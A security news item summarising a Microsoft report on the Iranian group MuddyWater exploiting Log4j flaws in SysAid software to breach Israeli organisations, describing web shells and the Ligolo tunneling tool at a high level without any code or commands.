Security News > 2022 > August > Microsoft: Iranian hackers still exploiting Log4j bugs against Israel
Hackers continue to exploit the Log4j vulnerability in vulnerable applications, as shown by the Iranian 'MuddyWater' threat actor who was found targeting Israeli organizations using the SysAid software.
The latest MuddyWater hacking campaign outlined in a Microsoft report yesterday constitutes the first example of leveraging vulnerable SysAid applications to breach corporate networks.
MuddyWater previously targeted VMWare instances that carried Log4j flaws to drop web shells, but assuming that these were eventually patched, the threat actors explored alternative options.
The Iranian hackers exploit Log4Shell flaws for initial access, running malicious PowerShell via a specially crafted request sent to vulnerable endpoints and dropping web shells.
Ligolo is an open-source reverse-tunneling tool that the hackers use for securing communications between backdoors and C2 infrastructure.
While Microsoft's report doesn't go into the details of the particular tool, we know from a March 2022 report by Security Joes that the hackers added useful features like execution checks and command-line parameters.
News URL
Related news
- Microsoft: Chinese hackers use Quad7 botnet to steal credentials (source)
- Iranian Hackers Use "Dream Job" Lures to Deploy SnailResin Malware in Aerospace Attacks (source)
- Iranian Hackers Deploy WezRat Malware in Attacks Targeting Israeli Organizations (source)
- Microsoft dangles $10K for hackers to hijack LLM email service (source)
- Hackers Use Microsoft MSC Files to Deploy Obfuscated Backdoor in Pakistan Attacks (source)